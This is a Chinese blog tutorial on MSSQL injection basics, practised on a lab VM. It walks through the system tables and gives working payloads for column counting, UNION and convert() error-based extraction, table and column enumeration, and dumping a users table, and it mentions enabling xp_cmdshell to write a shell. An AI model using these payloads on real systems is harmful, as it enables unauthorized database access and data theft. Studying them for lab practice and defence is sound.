MSsql注入基础

最新推荐文章于 2024-04-30 10:03:31 发布
最新推荐文章于 2024-04-30 10:03:31 发布
阅读量945 收藏 23
点赞数 10
文章标签: 数据库 mssql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79885863/article/details/136979388
版权

靶场MSsql
链接:https://www.123pan.com/s/wXTmjv-9LYiH.html
提取码:9930
在这里插入图片描述
这个vmx直接用虚拟机打开,然后确保主机和虚拟机能ping通

一、默认四个系统数据库

mssql数据库是强类型数据库

master 数据库记录了所有的 SQL Server 数据库系统的系统级信息,如用户帐户,配置设置,并在所有其他数据库信息。

model数据库是一个模板数据库。:每当创建一个新的数据库(包括系统数据库的TempDB),会创建以 Model数据库为副本数据库,并更改成数据库时所用的名

msdb 数据库是 SQL Server 代理的数据库,用于配置警报使用 SQL Server 代理和预定作业等。

tempddb 数据库是由 SQL Server 用于暂时存储数据的,这其中包含所有临时表,临时存储过程,并通过 SQL Server 生成任何其他临时存储需求。

  1. Master库
    • 表名:
      sysdatabases表(包含数据库所有信息,如数据库名称、状态)
      sysobjects表(包含数据库所有对象的信息)
      syscolumns 表
    • 字段:name(对象名)id(对象id)xtype(对象类型代码)
      其中xtype这个字段特殊性:当这个表是用户自己创建事,xtype=‘U’
  2. Model库
    表名:【sysobjects表、syscolumns表
  3. Msdb库
    表名:【sysobjects表、syscolumns表
  4. temp库
    表名:【sysobjects表、syscolumns表

每个库都有【sysobjects表、syscolumns表】这两个表

自己在MSSQL数据库中间创建一个users库,库中有User用户表
Users库

MSSOL-USERS
Sysobjects
syscolumns
user
qita

user表

User
usernamepasswordid

Users.sysobjects 表

sysobjects
nameidxtype
sysobjects1s
syscolumns2s
qita3U
user4U
**Users.syscolumns表**
Syscloumns
nameid
username3
password3
id3
name1
id1
xtype1
对应id是3的话那么说明它是属于user表的 id为1的话属于sysobjects表的

sysobjects相当于mysql中information中的tables,用来存表名
syscolumns相当于information中的columns表,用来存字段
mysql直接用关联把字段名,表名进行关联,而mssql使用id来进行关联,用id来区分你是属于哪个表

mssql数据库只要你新建了库,都会有sysobjects(name,id,xtype)和syscolumns(name,id)这两个表,字段也是永远只有那几个。

于是只要我们知道库名,直接找库里面sysobjects和syscolumns,因为这个库里面的所有表名和字段,都会存在那两个表中

实操

在这里插入图片描述
1.先判断是字符型还是数字型
在这里插入图片描述
在这里插入图片描述
两次回显结果不一样,我们看看1/1,1/0是什么样子的
在这里插入图片描述
在这里插入图片描述
很显然这里是字符型,因为输入一个一个引号时说,字符串’1’'引号不完整,两个引号报错说转换int失败,报错信息是不一样的,很显然这是一个单引号注入

我们先判断权限

判断权限,如果页面回显正常则为正确,否则报错

and 1=(select IS SRVROLEMEMBER('sysadmin'))--

获取当前数据库

接下来我们正常用联合查询跑一下

id=1' order by 5--+

看一下列是否超出了5
在这里插入图片描述
在构造,发现4也超出,但是3不超出,所以列有3列

d=1' order by 4--+
d=1' order by 3--+

在这里插入图片描述
正常的语句,但是会报错,因为mssql是强类型数据库,前面是字符型,后面是数字型,所以会报错

id=1' union select 1,2,3--+
id=1' union select '1','2','3'--+

在这里插入图片描述
在这里插入图片描述

id=1' union select '1','2',db_name()--+
db_name():返回当前数据库的名称

在这里插入图片描述

获取当前数据库内的所有数据表

and 1=convert(int,(select quotename(name) from 数据库名..sysobjects where xtype='U' FOR XML PATH('')))--

select quotename(name) from 数据库名…sysobjects where xtype=‘U’ FOR XML PATH(‘’)
quotename(name)和mysql中group_concat(
用逗号隔开,组成新的字符串),而quotename是用中括号连接起来组成新的
这里是从test数据库的sysobjects表
dbo:是它的用户名,每次都要接上,可以用user查看
xtype=‘U’:用户类型,要指明,一般我们自己建的表,存的数据,一些网站存的数据毕竟是用户创的
FOR XML PATH(‘’):以字符型输出
在这里插入图片描述
在这里插入图片描述
我们表跑出来了,好像对我们有用的表是users,我们首先跑users表,sysobjects表和syscolumns表关联字段是id
首先我们要找到sysobjects表中users的id是多少,并且把id赋给syscolumns表

and 1=(select quotename(name) from 数据库名..syscolumns where id=(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--

在这里插入图片描述

获取数据

select top 1 quotename(username) from test.dbo.users for xml path('')

在这里插入图片描述
在这里插入图片描述
按顺序输出对应下拼接函数只能一个字段

报错

convert()

强类型转换

convert(int,db_name())=1

在这里插入图片描述
会直接给我们报出来,user也是一样,用1/user=1或1-user=1都可以在这里插入图片描述

命令注入

在这里插入图片描述
首先要激发xp_cmdshell的存储过程
在这里插入图片描述
启动高级选项显示
在这里插入图片描述
让上一张图个(启动高级选项显示)生效
在这里插入图片描述
启用mssql的xp cmdshell功能
在这里插入图片描述
上一张图生效

扩展写shell

在这里插入图片描述
其他
在这里插入图片描述

本人能力有限,此学习笔记仅为个人见解,如有错误,欢迎批评指正!

美式coffee
关注
  • 10
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSSQL注入的详细入门讲解
寒虚子
12-05 65
因此,这个查询实际上就变成了SELECT * FROM users WHERE username = ‘admin’,如果存在用户名为admin的用户,那么查询就会返回该用户的所有信息,从而绕过了密码验证。MSSQL注入是一种常见的网络攻击技巧,通过输入恶意的SQL语句到应用程序的查询中,攻击者可以从数据库中读取敏感信息,甚至可以修改或删除数据。任何使用MSSQL作为后端数据库的应用程序,如果没有正确的防护措施,都可能成为MSSQL注入的目标。今天,我们将深入探讨MSSQL注入的基本原理和实践方法。
MSSQL数据库系统
Hdvsns的博客
06-26 1570
由于微软和Linux的紧密的联系的建立,Linux系统管理员如果想始终保持在他们的事业顶端,需要有关于MS SQL Server的渊博知识。我们这次用的是mssql-server-preview/下的mssql-server-15.0.1100.94-1.x86_64.rpm。4.选择开发版2和简体中文10,并输入sa(mssql的系统管理账号)用的较复杂密码两遍(建议用Aa123456)mssql-tools安装目录加入系统路径(未关机生效)。1.进入安装目的目录/opt/mssql/bin/
MSSQL注入基础语句
zwish的信安之路
04-23 630
MSSQL注入 一、基础知识 MssqlSQL Sever,SQL Server 是Microsoft 公司推出的关系型数据库管理系统,Sql Sever通常与IIS服务器搭配使用。 1)常见的一些系统函数: User;User_name(); 系统用户 db_name() 当前数据库的名字 host_name 主机名 @@version 数据库版本 @@servername ...
MSSQL数据库注入(一)
hhhshd的博客
11-17 5394
1. MSSQL注入手工联合注入 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql使用的函数在mssql中有些会起不到作用点。 (例如:在mssql中只能用top 取代limt 0,N,row_number() over()函数取代limit N,M) mssql使用上和可移植等方面与mysql存在不同的差异。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 7858
之前一直有粉丝朋友,在挖漏洞过程中使用SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
mysql注入绕过技术
06-04
### MySQL注入绕过技术 #### 引言 在网络安全领域,SQL注入是一种常见的攻击手段,攻击者通过在应用程序中插入恶意SQL代码来控制数据库。针对这种威胁,许多开发者实施了过滤机制来防御潜在的SQL注入攻击。然而,...
MYSQL 注入天书
03-04
MySQL注入是一种安全漏洞利用手段,攻击者通过在Web应用的输入字段中输入恶意SQL代码,试图操控后台数据库,以获取敏感信息或对数据库执行非授权操作。由于SQL注入攻击的危害性极大,对网站安全构成严重威胁,因此...
mysql注入获取数据表_SQL注入之获取指定数据库数据Mysql基础篇)
weixin_39750190的博客
01-25 2990
前言> 我们知道,在我们进行某网站sql注入的时候,我们有时候只可以进行简单的 union select user(),version(),@@basedir() #> 这类简单的查询,想要获得管理员用户密码或者敏感信息的时候就很难搞,因为我们不知道他的数据库表的名字以及字段名字,这篇文章就是介绍一下如果利用Mysql数据库自带的information_schema数据库获取其他数据库...
PHP、mysql(手工注入
10-12
1. **理解SQL注入基础** - SQL注入的基本原理是攻击者将构造的SQL命令嵌入到应用的查询语句中,使得原本正常的SQL语句变为恶意指令。 - 示例:一个简单的登录表单可能接收用户名和密码,如果未进行适当验证,攻击...
web与mysql注入.pdf
07-09
Web 与 MySQL 注入 从 Web 的发展史到 SQL 注入,...本文详细介绍了 Web 的发展史、Web 基础知识、PHP 语言、数据库类型、MySQL 数据库SQL 注入,希望读者能够了解 Web 和 MySQL 的重要性,并防止 SQL 注入的攻击。
简单MSSQL数据库管理工具
02-23
简单数据库管理工具,VB源码,用于管理MSSQL数据库.常用功能,修改登录口令,备份,恢复数据库,分离,附近数据库!附VB源码+安装包.对于安装了MSSQL桌面版,没有安装管理工具的用户,可用此工具还原备份数据库!
MSSQL数据库比较工具
12-24
比较两个mySQL数据库的差异,一个是标准数据库,一个是待测数据库。比较结果保存在SQL。另外的功能就是 把数据库中的表结构导出到WORD中。
MSSQL数据库的安装与使用
ibailexiong的博客
06-30 1555
MSSQL是大步份版本收费的关系型数据库服务器软件SQL Server主要在常见的互联网公司使用。2016年推出linux版。由于微软和Linux的紧密的联系的建立,Linux系统管理员如果想始终保持在他们的事业顶端,需要有关于的渊博知识。我们这次用的是下的。
MSSQL数据库系统(一)
txd1123的博客
06-21 2303
MSsql基础操作MSSQL是大步份版本收费的关系型数据库服务器软件,SQL Server主要在常见的互联网公司使用。2016年推出 linux版。由于微软和Linux的紧密的联系的建立,Linux系统管理员如果想始终保持在他们的事业顶端,需要有关于MS SQL Server的渊博知识。安装包位置:https://packages.microsoft.com//rhel/7/
MSsql基础操作
最新发布
2301_76901027的博客
04-30 889
6、修改完成后,点击下面的确定进行恢复,这时会出现一个进度条,提示恢复的进度,恢复完成后系统会自动提示成功,如中间提示报错,请记录下相关的错误内容并询问对SQL操作比较熟悉的人员,一般的错误无非是目录错误或者文件名重复或者文件名错误或者空间不够或者数据库正在使用中的错误,数据库正在使用的错误您可以尝试关闭所有关于SQL窗口然后重新打开进行恢复操作,如果还提示正在使用的错误可以将SQL服务停止然后重起看看,至于上述其它的错误一般都能按照错误内容做相应改动后即可恢复。备份和还原策略包含备份部分和还原部分。
MS SQL Server 数据库基础篇)
黑夜中的潜行者
03-17 4144
1.0 数据库数据库系统 1.1数据库是什么 1.2 数据库系统(DBS) 1.3 数据库管理系统(DBMS) 1.4 数据库的作用 1.5 应用程序 1.6 注 2.0 管理数据库 2.1 创建数据库 2.2 判断数据库是否存在 2.3 使用数据库 2.4 删除数据库 2.5 创建数据表 2.6 判断表是否存在 2.7 删除数据表 2.8 判断某表的某字段是否存在 3.0 SQL Server 数据类型 4.0 数据完整性 5.0 创建约束
MS SQL数据库
分享我的点点滴滴,在成长路上与你同行!
12-28 3573
一、数据库能做哪些?         1)存储大量数据,方便检索和访问    2)保持数据信息的一致、完整    3)共享和安全    4)通过组合分析,产生新的有用信息 二、数据库是什么?       1) 数据库就是“数据”的“仓库”。    2)数据库中包含表、关系以及操作对象    3)数据存放在表中 三、mssql数据库是什么
MSSQL数据库初级到高级的学习资料整理
助力工匠精神
07-19 788
SQL原理及高级语法,助力企业程序员进阶
个人MSSQL总结及收集
qq_36334672的博客
02-05 1031
*Sysobjects表: **SQL-SERVER的每个数据库内都有此系统表,它存放该数据库内创建的所有对象,如约束、 默认值、日志、规则、存储过程等,每个对象在表中占一行。**Name, id, xtype, uid, status: **分别是对象名,对象ID,对象类型,所有者对象的用户ID,对象状态。
MySQL注入基础:数据结构与SQL操作
本节将探讨MySQL注入的相关知识点,包括MySQL数据库结构、SQL的基本操作、常用函数以及注释方式,这些都是理解和防御SQL注入攻击的基础。 在MySQL 5.x及以上版本中,`information_schema`数据库被引入,用于存储...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值